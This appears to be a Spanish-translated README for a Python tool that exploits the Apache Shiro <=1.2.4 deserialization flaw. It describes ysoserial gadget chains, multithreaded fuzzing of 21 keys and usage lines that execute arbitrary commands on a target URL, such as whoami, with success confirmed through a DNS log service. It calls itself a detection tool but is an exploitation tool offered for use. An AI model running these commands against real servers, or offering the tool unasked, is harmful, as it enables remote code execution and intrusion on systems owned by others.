
shiro 1.2.47 deserialización
Herramienta de detección con un clic para la deserialización de Shiro<=1.2.4
Cambios: 1. Se agregaron 4 módulos de cadenas de explotación (CommonsCollections7-10), se espera que la tasa de éxito aumente un 30%; ya está empaquetado en el nuevo jar de ysoserial, no lo reemplace
Cambios: 2. Se agregó multihilo; aunque se agregaron módulos, la velocidad aumentó un 300%
集成21个key进行fuzz
Si te resulta útil, danos una estrella. Artículo de blog correspondiente: http://www.svenbeast.com/post/tskRKJIPg/
pip3 install -r requirments.txt
Uso: python3 shiro.py url command
Uso: python3 shiro.py https://url.com whoami
http://www.dnslog.cn/ Se recomienda usar esta plataforma dnslog para la verificación; es mucho más rápida que cecye.io
Recuerda poner entre comillas los comandos que contengan espacios
Uso: python3 shiro.py http://url.com "ping dnslog.cn"
Ejecuta los 11 módulos completos y luego ve a la plataforma dnslog para comprobar si se recibió la solicitud. Si no aparece, GG; también puede ser que las codificaciones no sean suficientes
Recopila las codificaciones por tu cuenta; bastará con que agregues métodos en el código fuente bajo la carpeta moule
Para simplificar la ejecución del script, la cantidad de subprocesos no se controla mediante parámetros del usuario; por defecto son 20 subprocesos. Si necesitas cambiarlo, modifica el parámetro de control de subprocesos en la línea 20 de /moule/main.py